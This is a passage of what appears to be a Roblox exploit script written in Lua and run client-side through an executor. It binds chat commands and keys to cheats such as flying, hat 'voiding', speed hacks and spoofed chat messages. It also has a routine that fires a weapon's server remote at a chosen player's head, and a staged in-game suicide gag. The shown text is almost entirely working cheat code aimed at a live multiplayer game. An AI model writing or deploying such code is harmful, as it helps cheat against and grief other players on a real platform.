  3412. game.Players.LocalPlayer.Character.Torso.Neck:Destroy()
  3413. else
  3414. game.Players.LocalPlayer.Character:ClearAllChildren()
  3415. local char = Instance.new("Model", workspace)
  3416. Instance.new("Humanoid", char)
  3417. game.Players.LocalPlayer.Character = char
  3418. end
  3419. end
  3420. end
  3421. end
  3422. if lower == "/e reset" then
  3423. if game.Players.LocalPlayer.Character ~= nil then
  3424. if game.Players.LocalPlayer.Character:FindFirstChild("Torso") then
  3425. if game.Players.LocalPlayer.Character.Torso:FindFirstChildOfClass("Glue") then
  3426. game.Players.LocalPlayer.Character.Torso.Neck:Destroy()
  3427. else
  3428. game.Players.LocalPlayer.Character:ClearAllChildren()
  3429. local char = Instance.new("Model", workspace)
  3430. Instance.new("Humanoid", char)
  3431. game.Players.LocalPlayer.Character = char
  3432. end
  3433. end
  3434. end
  3435. end
  3436. if lower == "/e :reset" then
  3437. if game.Players.LocalPlayer.Character ~= nil then
  3438. if game.Players.LocalPlayer.Character:FindFirstChild("Torso") then
  3439. if game.Players.LocalPlayer.Character.Torso:FindFirstChildOfClass("Glue") then
  3440. game.Players.LocalPlayer.Character.Torso.Neck:Destroy()
  3441. else
  3442. game.Players.LocalPlayer.Character:ClearAllChildren()
  3443. local char = Instance.new("Model", workspace)
  3444. Instance.new("Humanoid", char)
  3445. game.Players.LocalPlayer.Character = char
  3446. end
  3447. end
  3448. end
  3449. end
  3450.  
  3451.  
  3452.  
  3453. if lower == ":rejoin" then
  3454. TeleportService:Teleport(455366377, game.Players.LocalPlayer)
  3455. end
  3456. if lower == "/e rejoin" then
  3457. TeleportService:Teleport(455366377, game.Players.LocalPlayer)
  3458. end
  3459. if lower == "/e :rejoin" then
  3460. TeleportService:Teleport(455366377, game.Players.LocalPlayer)
  3461. end
  3462.  
  3463. if lower == ":void" then
  3464. local hat = game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Accessory")
  3465. if voidtoggle == false and voidprocessing == false then
  3466. voidprocessing = true
  3467. local handle = hat:FindFirstChild("Handle")
  3468. local Tool = Instance.new("Tool", game.Players.LocalPlayer.Backpack)
  3469. game.Players.LocalPlayer.Character.Torso.Anchored = true
  3470. handle.Parent = Tool
  3471. handle.Massless = true
  3472. Tool.GripPos = Vector3.new(0,tonumber(9e99),0)
  3473. Tool.Parent = game.Players.LocalPlayer.Character
  3474. repeat wait() until game.Players.LocalPlayer.Character:FindFirstChild("Tool")~=nil
  3475. Tool.Grip = CFrame.new(Vector3.new(0,0,0))
  3476. game.Players.LocalPlayer.Character.Torso.Anchored = false
  3477. Tool.Unequipped:Connect(function()
  3478. wait()
  3479. local Handle = Tool:FindFirstChild("Handle")
  3480. if Handle then
  3481. Handle.Parent = hat
  3482. game.Players.LocalPlayer.Character.Humanoid:UnequipTools()
  3483. Handle.Massless = false
  3484. Tool:Destroy()
  3485. end
  3486. voidtoggle = false
  3487. end)
  3488. voidtoggle = true
  3489. voidprocessing = false
  3490. end
  3491. end
  3492.  
  3493. if lower == "/e void" then
  3494. local hat = game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Accessory")
  3495. if voidtoggle == false and voidprocessing == false then
  3496. voidprocessing = true
  3497. local handle = hat:FindFirstChild("Handle")
  3498. local Tool = Instance.new("Tool", game.Players.LocalPlayer.Backpack)
  3499. game.Players.LocalPlayer.Character.Torso.Anchored = true
  3500. handle.Parent = Tool
  3501. handle.Massless = true
  3502. Tool.GripPos = Vector3.new(0,tonumber(9e99),0)
  3503. Tool.Parent = game.Players.LocalPlayer.Character
  3504. repeat wait() until game.Players.LocalPlayer.Character:FindFirstChild("Tool")~=nil
  3505. Tool.Grip = CFrame.new(Vector3.new(0,0,0))
  3506. game.Players.LocalPlayer.Character.Torso.Anchored = false
  3507. Tool.Unequipped:Connect(function()
  3508. wait()
  3509. local Handle = Tool:FindFirstChild("Handle")
  3510. if Handle then
  3511. Handle.Parent = hat
  3512. game.Players.LocalPlayer.Character.Humanoid:UnequipTools()
  3513. Handle.Massless = false
  3514. Tool:Destroy()
  3515. end
  3516. voidtoggle = false
  3517. end)
  3518. voidtoggle = true
  3519. voidprocessing = false
  3520. end
  3521. end
  3522.  
  3523. if lower == "/e :void" then
  3524. local hat = game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Accessory")
  3525. if voidtoggle == false and voidprocessing == false then
  3526. voidprocessing = true
  3527. local handle = hat:FindFirstChild("Handle")
  3528. local Tool = Instance.new("Tool", game.Players.LocalPlayer.Backpack)
  3529. game.Players.LocalPlayer.Character.Torso.Anchored = true
  3530. handle.Parent = Tool
  3531. handle.Massless = true
  3532. Tool.GripPos = Vector3.new(0,tonumber(9e99),0)
  3533. Tool.Parent = game.Players.LocalPlayer.Character
  3534. repeat wait() until game.Players.LocalPlayer.Character:FindFirstChild("Tool")~=nil
  3535. Tool.Grip = CFrame.new(Vector3.new(0,0,0))
  3536. game.Players.LocalPlayer.Character.Torso.Anchored = false
  3537. Tool.Unequipped:Connect(function()
  3538. wait()
  3539. local Handle = Tool:FindFirstChild("Handle")
  3540. if Handle then
  3541. Handle.Parent = hat
  3542. game.Players.LocalPlayer.Character.Humanoid:UnequipTools()
  3543. Handle.Massless = false
  3544. Tool:Destroy()
  3545. end
  3546. voidtoggle = false
  3547. end)
  3548. voidtoggle = true
  3549. voidprocessing = false
  3550. end
  3551. end
  3552.  
  3553. if lower == ":breakneck" then
  3554. local Anim = Instance.new("Animation")
  3555. Anim.AnimationId = "rbxassetid://35154961"
  3556. local neckbreak = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim)
  3557. neckbreak:Play(0)
  3558. neckbreak:AdjustSpeed(1)
  3559. wait(1.3)
  3560. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer('*crack*',"All")
  3561. wait(0.6)
  3562. if game.Players.LocalPlayer.Character ~= nil then
  3563. if game.Players.LocalPlayer.Character:FindFirstChild("Torso") then
  3564. if game.Players.LocalPlayer.Character.Torso:FindFirstChild("Neck") then
  3565. game.Players.LocalPlayer.Character.Torso:FindFirstChild("Neck"):Destroy()
  3566. end
  3567. end
  3568. end
  3569. end
  3570.  
  3571. if lower == "/e breakneck" then
  3572. local Anim = Instance.new("Animation")
  3573. Anim.AnimationId = "rbxassetid://35154961"
  3574. local neckbreak = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim)
  3575. neckbreak:Play(0)
  3576. neckbreak:AdjustSpeed(1)
  3577. wait(1.3)
  3578. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer('*crack*',"All")
  3579. wait(0.6)
  3580. if game.Players.LocalPlayer.Character ~= nil then
  3581. if game.Players.LocalPlayer.Character:FindFirstChild("Torso") then
  3582. if game.Players.LocalPlayer.Character.Torso:FindFirstChild("Neck") then
  3583. game.Players.LocalPlayer.Character.Torso:FindFirstChild("Neck"):Destroy()
  3584. end
  3585. end
  3586. end
  3587. end
  3588.  
  3589. if lower == "/e :breakneck" then
  3590. local Anim = Instance.new("Animation")
  3591. Anim.AnimationId = "rbxassetid://35154961"
  3592. local neckbreak = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim)
  3593. neckbreak:Play(0)
  3594. neckbreak:AdjustSpeed(1)
  3595. wait(1.3)
  3596. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer('*crack*',"All")
  3597. wait(0.6)
  3598. if game.Players.LocalPlayer.Character ~= nil then
  3599. if game.Players.LocalPlayer.Character:FindFirstChild("Torso") then
  3600. if game.Players.LocalPlayer.Character.Torso:FindFirstChild("Neck") then
  3601. game.Players.LocalPlayer.Character.Torso:FindFirstChild("Neck"):Destroy()
  3602. end
  3603. end
  3604. end
  3605. end
  3606.  
  3607.  
  3608. if lower == ":autoreset" then
  3609. autoreset = true
  3610. end
  3611. if lower == "/e autoreset" then
  3612. autoreset = true
  3613. end
  3614. if lower == "/e :autoreset" then
  3615. autoreset = true
  3616. end
  3617.  
  3618. if lower == ":unautoreset" then
  3619. autoreset = false
  3620. end
  3621. if lower == "/e unautoreset" then
  3622. autoreset = false
  3623. end
  3624. if lower == "/e :unautoreset" then
  3625. autoreset = false
  3626. end
  3627.  
  3628.  
  3629. if lower == ":autokill" then
  3630. autoreset = true
  3631. end
  3632. if lower == "/e autokill" then
  3633. autoreset = true
  3634. end
  3635. if lower == "/e :autokill" then
  3636. autoreset = true
  3637. end
  3638.  
  3639. if lower == ":unautokill" then
  3640. autoreset = false
  3641. end
  3642. if lower == "/e unautokill" then
  3643. autoreset = false
  3644. end
  3645. if lower == "/e :unautokill" then
  3646. autoreset = false
  3647. end
  3648.  
  3649. end
  3650.  
  3651.  
  3652.  
  3653. local debounce = false
  3654.  
  3655. function fireat(target)
  3656. if debounce == false then
  3657. debounce = true
  3658. for i = 1,3 do
  3659. if game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Tool") then
  3660. if game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Tool"):FindFirstChild("Fire") then
  3661. u = game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Tool").Fire
  3662. if target.Character ~= nil then
  3663. if not IsInTable(dontshoot, target.Name) then
  3664. u:FireServer(targetee.Character.Head.CFrame)
  3665. end
  3666. end
  3667. end
  3668. end
  3669. wait(0.1)
  3670. end
  3671. debounce = false
  3672. end
  3673. end
  3674.  
  3675.  
  3676.  
  3677. Target.FocusLost:Connect(function()
  3678. local name = string.lower(Target.Text)
  3679. local player = nil
  3680.  
  3681. names = game.Players:GetChildren()
  3682.  
  3683. for i,x in pairs(names) do
  3684. strlower = string.lower(x.Name)
  3685. sub = string.sub(strlower,1,#name)
  3686.  
  3687. if name == sub then
  3688. player = x
  3689. if player.Name ~= game.Players.LocalPlayer.Name and x.Name ~= "Vortexturize" then
  3690. targetee = player
  3691. end
  3692. end
  3693. end
  3694. end)
  3695.  
  3696.  
  3697.  
  3698.  
  3699.  
  3700.  
  3701.  
  3702. mouse.KeyDown:Connect(function(key)
  3703. if key == "q" then
  3704. if game.Players.LocalPlayer.Character:FindFirstChild("Uzi") or game.Players.LocalPlayer.Backpack:FindFirstChild("Uzi") then
  3705. bigfire = true
  3706. end
  3707. end
  3708. end)
  3709.  
  3710.  
  3711. mouse.KeyUp:Connect(function(key)
  3712. if key == "q" then
  3713. bigfire = false
  3714. end
  3715. end)
  3716.  
  3717. mouse = game.Players.LocalPlayer:GetMouse()
  3718.  
  3719.  
  3720. mouse.KeyDown:Connect(function(key)
  3721. if string.byte(key) == 92 then
  3722. if game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Tool") then
  3723. game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Tool").Parent = game.Workspace.Terrain
  3724. end
  3725. end
  3726. end)
  3727.  
  3728.  
  3729. mouse.KeyDown:Connect(function(key)
  3730. if key == "g" then
  3731. game.Players:Chat("/e kick")
  3732. end
  3733. end)
  3734.  
  3735.  
  3736.  
  3737.  
  3738. mouse.KeyDown:Connect(function(key)
  3739. if key == "w" then
  3740. flyw = true
  3741. end
  3742. end)
  3743.  
  3744. mouse.KeyUp:Connect(function(key)
  3745. if key == "w" then
  3746. flyw = false
  3747. end
  3748. end)
  3749.  
  3750.  
  3751. mouse.KeyDown:Connect(function(key)
  3752. if key == "s" then
  3753. flys = true
  3754. end
  3755. end)
  3756. mouse.KeyUp:Connect(function(key)
  3757. if key == "s" then
  3758. flys = false
  3759. end
  3760. end)
  3761.  
  3762.  
  3763. mouse.KeyDown:Connect(function(key)
  3764. if key == "d" then
  3765. flyd = true
  3766. end
  3767. end)
  3768.  
  3769. mouse.KeyUp:Connect(function(key)
  3770. if key == "d" then
  3771. flyd = false
  3772. end
  3773. end)
  3774.  
  3775. mouse.KeyDown:Connect(function(key)
  3776. if key == "a" then
  3777. flya = true
  3778. end
  3779. end)
  3780.  
  3781. mouse.KeyUp:Connect(function(key)
  3782. if key == "a" then
  3783. flya = false
  3784. end
  3785. end)
  3786.  
  3787. mouse.KeyDown:Connect(function(key)
  3788. if key == " " then
  3789. flysp = true
  3790. end
  3791. end)
  3792.  
  3793. mouse.KeyUp:Connect(function(key)
  3794. if key == " " then
  3795. flysp = false
  3796. end
  3797. end)
  3798.  
  3799.  
  3800. mouse.KeyDown:Connect(function(key)
  3801. if key == "0" then -- love mouse.keydown, and how left shift is also 0
  3802. flyct = true
  3803. end
  3804. end)
  3805.  
  3806. mouse.KeyUp:Connect(function(key)
  3807. if key == "0" then
  3808. flyct = false
  3809. end
  3810. end)
  3811.  
  3812.  
  3813.  
  3814.  
  3815. mouse.KeyDown:Connect(function(key)
  3816. if key == "t" then
  3817. if targetee ~= nil then
  3818. if targetee.Character ~= nil then
  3819. fireat(targetee)
  3820. end
  3821. end
  3822. end
  3823. end)
  3824.  
  3825. mouse.KeyDown:Connect(function(key)
  3826. if key == "r" and rolldebounce == false then
  3827. rolldebounce = true
  3828. local Anim = Instance.new("Animation")
  3829. Anim.AnimationId = "rbxassetid://229782914"
  3830. local roll = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim)
  3831. roll.Name = "FUCK"
  3832. if game.Players.LocalPlayer.Character ~= nil then
  3833. if game.Players.LocalPlayer.Character:FindFirstChild("Left Leg") and game.Players.LocalPlayer.Character:FindFirstChild("Right Leg") then
  3834. game.Players.LocalPlayer.Character:FindFirstChild("Left Leg").Parent = game.Workspace.Terrain
  3835. game.Players.LocalPlayer.Character:FindFirstChild("Right Leg").Parent = game.Workspace.Terrain
  3836. end
  3837. end
  3838. roll:Play(0)
  3839. roll:AdjustSpeed(1)
  3840. roll.Stopped:Connect(function()
  3841. if game.Workspace.Terrain:FindFirstChild("Left Leg") and game.Workspace.Terrain:FindFirstChild("Right Leg") and game.Players.LocalPlayer.Character ~= nil then
  3842. game.Workspace.Terrain:FindFirstChild("Left Leg").Parent = game.Players.LocalPlayer.Character
  3843. game.Workspace.Terrain:FindFirstChild("Right Leg").Parent = game.Players.LocalPlayer.Character
  3844. end
  3845. rolldebounce = false
  3846. end)
  3847. repeat
  3848. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,-1)
  3849. wait(0.000001)
  3850. until rolldebounce == false
  3851. end
  3852. end)
  3853.  
  3854. mouse.KeyDown:Connect(function(key)
  3855. if key == "x" then
  3856. Selecting = true
  3857. end
  3858. end)
  3859. mouse.KeyUp:Connect(function(key)
  3860. if key == "x" then
  3861. Selecting = false
  3862. end
  3863. end)
  3864.  
  3865.  
  3866.  
  3867. mouse.KeyDown:Connect(function(key)
  3868. if key == "[" then
  3869. jumpspeed = jumpspeed - 0.1
  3870. end
  3871. end)
  3872.  
  3873.  
  3874.  
  3875.  
  3876.  
  3877.  
  3878. mouse.KeyDown:Connect(function(key)
  3879. if key == "]" then
  3880. jumpspeed = jumpspeed + 0.1
  3881. end
  3882. end)
  3883.  
  3884.  
  3885.  
  3886.  
  3887. mouse.KeyDown:Connect(function(key)
  3888. if key == "l" then
  3889. if jumpgcheck == false then
  3890. jumpgcheck = true
  3891. elseif jumpgcheck == true then
  3892. jumpgcheck = false
  3893. end
  3894.  
  3895. end
  3896. end)
  3897.  
  3898.  
  3899.  
  3900.  
  3901.  
  3902. mouse.KeyDown:Connect(function(key)
  3903. if key == " " and jumpgcheck == true then
  3904. SpaceHeld = true
  3905. end
  3906. end)
  3907.  
  3908. mouse.KeyUp:Connect(function(key)
  3909. if key == " " then
  3910. SpaceHeld = false
  3911. end
  3912. end)
  3913.  
  3914. mouse.KeyDown:Connect(function(key)
  3915. if key == "-" then
  3916. runspeed = runspeed - 0.1
  3917. end
  3918. end)
  3919.  
  3920.  
  3921.  
  3922. mouse.KeyDown:Connect(function(key)
  3923. if key == "=" then
  3924. runspeed = runspeed + 0.1
  3925. end
  3926. end)
  3927.  
  3928.  
  3929.  
  3930. mouse.KeyDown:Connect(function(key)
  3931. if key == "k" then
  3932. if gcheckrun == false then
  3933. gcheckrun = true
  3934. elseif gcheckrun == true then
  3935. gcheckrun = false
  3936. end
  3937.  
  3938. end
  3939. end)
  3940.  
  3941.  
  3942.  
  3943.  
  3944. mouse.KeyDown:Connect(function(key)
  3945. if key == "0" and gcheckrun == true then
  3946. ShiftHeld = true
  3947. end
  3948. end)
  3949.  
  3950. mouse.KeyUp:Connect(function(key)
  3951. if key == "0" then
  3952. ShiftHeld = false
  3953. end
  3954. end)
  3955.  
  3956.  
  3957. mouse.KeyDown:Connect(function(key)
  3958. if key == "w" then
  3959. WHeld = true
  3960. end
  3961. end)
  3962.  
  3963. mouse.KeyUp:Connect(function(key)
  3964. if key == "w" then
  3965. WHeld = false
  3966. end
  3967. end)
  3968.  
  3969. mouse.KeyDown:Connect(function(key)
  3970. if key == "s" then
  3971. SHeld = true
  3972. end
  3973. end)
  3974.  
  3975. mouse.KeyUp:Connect(function(key)
  3976. if key == "s" then
  3977. SHeld = false
  3978. end
  3979. end)
  3980.  
  3981.  
  3982. mouse.KeyDown:Connect(function(key)
  3983. if key == "a" then
  3984. AHeld = true
  3985. end
  3986. end)
  3987.  
  3988. mouse.KeyUp:Connect(function(key)
  3989. if key == "a" then
  3990. AHeld = false
  3991. end
  3992. end)
  3993.  
  3994.  
  3995. mouse.KeyDown:Connect(function(key)
  3996. if key == "d" then
  3997. DHeld = true
  3998. end
  3999. end)
  4000.  
  4001. mouse.KeyUp:Connect(function(key)
  4002. if key == "d" then
  4003. DHeld = false
  4004. end
  4005. end)
  4006.  
  4007.  
  4008.  
  4009.  
  4010. mouse.KeyDown:Connect(function(key)
  4011. if key == "p" then
  4012. if game.Players.LocalPlayer.Character.Torso:FindFirstChild("Neck") then
  4013. game.Players.LocalPlayer.Character.Torso:FindFirstChild("Neck"):Destroy()
  4014. end
  4015. end
  4016. end)
  4017.  
  4018.  
  4019.  
  4020. mouse.KeyDown:Connect(function(key)
  4021. if key == "n" then
  4022. stationaryrespawn = not stationaryrespawn
  4023. end
  4024. end)
  4025.  
  4026.  
  4027.  
  4028.  
  4029.  
  4030.  
  4031.  
  4032. mouse.KeyDown:Connect(function(key)
  4033. if key == "b" then
  4034.  
  4035. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  4036. if (v:IsA("Tool")and v.Name ~= "Uzi") then
  4037. v.Parent = game.Players.LocalPlayer.Backpack
  4038. end
  4039. end
  4040.  
  4041. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  4042. if (v:IsA("Tool")and v.Name == "Uzi") then
  4043. v.Parent = game.Players.LocalPlayer.Character
  4044. end
  4045. end
  4046. game.Players.LocalPlayer.Character:WaitForChild("Uzi")
  4047.  
  4048. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  4049. if (v:IsA("Tool")and v.Name == "Uzi") then
  4050. if forward == false then
  4051. v.Grip = CFrame.new(0,-12,60)
  4052. uncancollide(v)
  4053. forward = true
  4054. elseif forward == true then
  4055. v.Grip = CFrame.new(0,0,0)
  4056. forward = false
  4057. end
  4058. end
  4059. end
  4060.  
  4061.  
  4062. end
  4063. end)
  4064.  
  4065.  
  4066. Mouse.KeyDown:Connect(function(key)
  4067. if key == "h" then
  4068.  
  4069. if not toggler then
  4070. toggler = true
  4071. startflying()
  4072. elseif toggler then
  4073. toggler = false
  4074. NOFLY()
  4075. if game.Players.LocalPlayer.Character then
  4076. if game.Players.LocalPlayer.Character:FindFirstChild("Float") then
  4077. game.Players.LocalPlayer.Character:FindFirstChild("Float"):Destroy()
  4078. end
  4079. end
  4080. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  4081. for i, track in pairs (AnimationTracks) do
  4082. track:Stop()
  4083. end
  4084. end
  4085.  
  4086. end
  4087. end)
  4088.  
  4089.  
  4090. mouse.KeyDown:Connect(function(key)
  4091. if key == "m" then
  4092. local notools = true
  4093. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  4094. if v:IsA("Tool") and v.Name == "Shotty" or v.Name == "Glock" then
  4095. table.insert(suicidetools, v)
  4096. notools = false
  4097. end
  4098. end
  4099. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  4100. if v:IsA("Tool") and v.Name == "Shotty" or v.Name == "Glock" then
  4101. table.insert(suicidetools, v)
  4102. notools = false
  4103. end
  4104. end
  4105. wait()
  4106. if not notools then
  4107. local pickedtool = suicidetools[math.random(1,#suicidetools)]
  4108. pickedtool.Parent = game.Players.LocalPlayer.Backpack
  4109. if pickedtool.Name == "Shotty" then
  4110. pickedtool.Grip = CFrame.new(0.1,0,-0.6) * CFrame.Angles(math.rad(-30),math.rad(210),math.rad(-20))
  4111. end
  4112. if pickedtool.Name == "Glock" then
  4113. pickedtool.Grip = CFrame.new(0.6,-0.6,0) * CFrame.Angles(math.rad(50),math.rad(300),math.rad(50))
  4114. end
  4115. pickedtool.Parent = game.Players.LocalPlayer.Character
  4116. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Goodbye cruel world!","All")
  4117. wait(2)
  4118. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(':(',"All")
  4119. pickedtool.Fire:FireServer(game.Players.LocalPlayer.Character.Head.CFrame)
  4120. wait(0.4)
  4121. game.Players.LocalPlayer.Character.Torso.Neck:Destroy()
  4122. end
  4123. for i = 1,#suicidetools do
  4124. table.remove(suicidetools, i)
  4125. end
  4126. end
  4127. end)
  4128.  
  4129.  
  4130.  
  4131. mouse.KeyDown:Connect(function(key)
  4132. if key == "v" then
  4133. if game.Players.LocalPlayer.Character:FindFirstChild("RabbitWitch") then
  4134. hat = game.Players.LocalPlayer.Character:FindFirstChild("RabbitWitch")
  4135. else
  4136. hat = game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Accessory")
  4137. end
  4138. if voidtoggle == false and voidprocessing == false then
  4139. voidprocessing = true
  4140. local handle = hat:FindFirstChild("Handle")
  4141. local Tool = Instance.new("Tool", game.Players.LocalPlayer.Backpack)
  4142. if game.Players.LocalPlayer.Character:FindFirstChild("Torso") then
  4143. game.Players.LocalPlayer.Character.Torso.Anchored = true
  4144. elseif game.Players.LocalPlayer.Character:FindFirstChild("UpperTorso") then
  4145. game.Players.LocalPlayer.Character.UpperTorso.Anchored = true
  4146. end
  4147. handle.Parent = Tool
  4148. handle.Massless = true
  4149. Tool.GripPos = Vector3.new(0,tonumber(9e99),0)
  4150. Tool.Parent = game.Players.LocalPlayer.Character
  4151. repeat wait() until game.Players.LocalPlayer.Character:FindFirstChild("Tool")~=nil
  4152. Tool.Grip = CFrame.new(Vector3.new(0,0,0))
  4153. if game.Players.LocalPlayer.Character:FindFirstChild("Torso") then
  4154. game.Players.LocalPlayer.Character.Torso.Anchored = false
  4155. elseif game.Players.LocalPlayer.Character:FindFirstChild("UpperTorso") then
  4156. game.Players.LocalPlayer.Character.UpperTorso.Anchored = false
  4157. end
  4158. Tool.Unequipped:Connect(function()
  4159. wait()
  4160. local Handle = Tool:FindFirstChild("Handle")
  4161. if Handle then
  4162. Handle.Parent = hat
  4163. game.Players.LocalPlayer.Character.Humanoid:UnequipTools()
  4164. Handle.Massless = false
  4165. Tool:Destroy()
  4166. end
  4167. voidtoggle = false
  4168. end)
  4169. voidtoggle = true
  4170. voidprocessing = false
  4171. elseif voidtoggle == true and voidprocessing == false then
  4172. voidprocessing = true
  4173. local Tool = game.Players.LocalPlayer.Backpack:FindFirstChild("Tool") or game.Players.LocalPlayer.Character:FindFirstChild("Tool")
  4174. local Handle = Tool:FindFirstChild("Handle")
  4175. if Handle then
  4176. Handle.Parent = hat
  4177. game.Players.LocalPlayer.Character.Humanoid:UnequipTools()
  4178. Handle.Massless = false
  4179. Tool:Destroy()
  4180. end
  4181. voidtoggle = true
  4182. voidprocessing = false
  4183. end
  4184. end
  4185. end)
  4186.  
  4187.  
  4188. game.Players.LocalPlayer.Chatted:connect(function(msg)
  4189. messagecommandshandle(game.Players.LocalPlayer,msg)
  4190. end)
  4191.  
  4192. game.Players.LocalPlayer.Character.Humanoid.StateChanged:Connect(function(old, new)
  4193. if new == Enum.HumanoidStateType.FallingDown or new == Enum.HumanoidStateType.PlatformStanding then
  4194. game.Players.LocalPlayer.Character.Humanoid.PlatformStand = false
  4195. game.Players.LocalPlayer.Character.Humanoid.Sit = false
  4196. game.Players.LocalPlayer.Character.Humanoid:ChangeState(Enum.HumanoidStateType.GettingUp)
  4197. game.Players.LocalPlayer.Character.Humanoid:ChangeState(Enum.HumanoidStateType.RunningNoPhysics)
  4198. end
  4199. if jumpshoot == true then
  4200. if new == Enum.HumanoidStateType.Jumping or new == Enum.HumanoidStateType.Landed or new == Enum.HumanoidStateType.Freefall or new == Enum.HumanoidStateType.FallingDown then
  4201. char.Humanoid.PlatformStand = false
  4202. char.Humanoid.Sit = false
  4203. char.Humanoid:ChangeState(Enum.HumanoidStateType.GettingUp)
  4204. char.Humanoid:ChangeState(Enum.HumanoidStateType.Running)
  4205. end
  4206. end
  4207. end)
  4208.  
  4209. game.Players.LocalPlayer.Character.Humanoid.AnimationPlayed:Connect(function(anim)
  4210. if rolldebounce == true and anim.Name ~= "FUCK" and not string.find(string.lower(anim.Name), "walk") then
  4211. anim:Stop()
  4212. end
  4213. end)
  4214.  
  4215.  
  4216.  
  4217. game.Players.LocalPlayer.CharacterAdded:Connect(function(char)
  4218. repeat wait() until char:FindFirstChild("Humanoid")
  4219. char.Humanoid.StateChanged:Connect(function(old, new)
  4220. if new == Enum.HumanoidStateType.FallingDown or new == Enum.HumanoidStateType.PlatformStanding then
  4221. char.Humanoid.PlatformStand = false
  4222. char.Humanoid.Sit = false
  4223. char.Humanoid:ChangeState(Enum.HumanoidStateType.GettingUp)
  4224. char.Humanoid:ChangeState(Enum.HumanoidStateType.RunningNoPhysics)
  4225. end
  4226. if jumpshoot == true then
  4227. if new == Enum.HumanoidStateType.Jumping or new == Enum.HumanoidStateType.Landed or new == Enum.HumanoidStateType.Freefall or new == Enum.HumanoidStateType.FallingDown then
  4228. char.Humanoid.PlatformStand = false
  4229. char.Humanoid.Sit = false
  4230. char.Humanoid:ChangeState(Enum.HumanoidStateType.GettingUp)
  4231. char.Humanoid:ChangeState(Enum.HumanoidStateType.Running)
  4232. end
  4233. end
  4234. end)
  4235. char.Humanoid.AnimationPlayed:Connect(function(anim)
  4236. if rolldebounce == true and anim.Name ~= "FUCK" and not string.find(string.lower(anim.Name), "walk") then
  4237. anim:Stop()
  4238. end
  4239. end)
  4240. end)
  4241.  
  4242. if game.Players.LocalPlayer.Character ~= nil then
  4243. if game.Players.LocalPlayer.Character:FindFirstChild("Torso") then
  4244. game.Players.LocalPlayer.Character.Torso.ChildAdded:Connect(function(child)
  4245. if child:IsA("Glue") and autoreset == true then
  4246. game.Players.LocalPlayer.Character:BreakJoints()
  4247. end
  4248. end)
  4249. end
  4250. game.Players.LocalPlayer.Character.ChildAdded:Connect(function(child)
  4251. local cnamelower = string.lower(child.Name)
  4252. if string.find(cnamelower, "bone") and autoreset == true then
  4253. game.Players.LocalPlayer.Character:BreakJoints()
  4254. end
  4255. end)
  4256. end
  4257.  
  4258. game.Players.LocalPlayer.CharacterAdded:Connect(function(char)
  4259. repeat wait() until char:FindFirstChild("Torso")
  4260. char.Torso.ChildAdded:Connect(function(child)
  4261. if child:IsA("Glue") and autoreset == true then
  4262. game.Players.LocalPlayer.Character:BreakJoints()
  4263. end
  4264. end)
  4265. game.Players.LocalPlayer.Character.ChildAdded:Connect(function(child)
  4266. local cnamelower = string.lower(child.Name)
  4267. if string.find(cnamelower, "bone") and autoreset == true then
  4268. game.Players.LocalPlayer.Character:BreakJoints()
  4269. end
  4270. end)
  4271. end)
  4272.  
  4273. game.Players.LocalPlayer.Character.Humanoid:GetPropertyChangedSignal("WalkSpeed"):Connect(function()
  4274. if walkshoot then
  4275. if game.Players.LocalPlayer.Character.Humanoid.WalkSpeed == 0 then
  4276. game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
  4277. end
  4278. end
  4279. end)
  4280.  
  4281. game.Players.LocalPlayer.CharacterAdded:Connect(function(char)
  4282. repeat wait() until char:FindFirstChild("Humanoid")
  4283. char.Humanoid:GetPropertyChangedSignal("WalkSpeed"):Connect(function()
  4284. if walkshoot then
  4285. if char.Humanoid.WalkSpeed == 0 then
  4286. char.Humanoid.WalkSpeed = 16
  4287. end
  4288. end
  4289. end)
  4290. end)
  4291.  
  4292.  
  4293.  
  4294.  
  4295. game.Players.LocalPlayer.CharacterAdded:connect(function(char)
  4296. stay = false
  4297. flymode = false
  4298.  
  4299. wait(0.6)
  4300. needsrespawning = false
  4301. haspos = false
  4302.  
  4303. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  4304. if v:IsA("BasePart") then
  4305. v.Anchored = false
  4306. end
  4307. end
  4308.  
  4309.  
  4310. wait(0.4)
  4311. giveSKey()
  4312. end)
  4313.  
  4314.  
  4315. game.Players.LocalPlayer.Backpack.ChildAdded:Connect(function(child)
  4316. if child.Name == "Uzi" and flymode == true then
  4317. wait()
  4318. child.Parent = game.Players.LocalPlayer.Character
  4319. end
  4320. end)
  4321.  
  4322. game.Players.LocalPlayer.Character.ChildAdded:Connect(function(child)
  4323. if child.Name ~= "Uzi" and flymode == true then
  4324. wait()
  4325. child.Parent = game.Players.LocalPlayer.Backpack
  4326. end
  4327. end)
  4328.  
  4329.  
  4330. game.CoreGui.RobloxPromptGui.promptOverlay.ChildAdded:Connect(function(child)
  4331. if child.Name == "ErrorPrompt" then
  4332. repeat wait() until child:FindFirstChild("MessageArea")
